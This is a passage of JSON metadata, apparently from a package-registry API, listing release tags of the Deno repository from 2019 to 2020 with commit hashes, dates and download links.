,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"p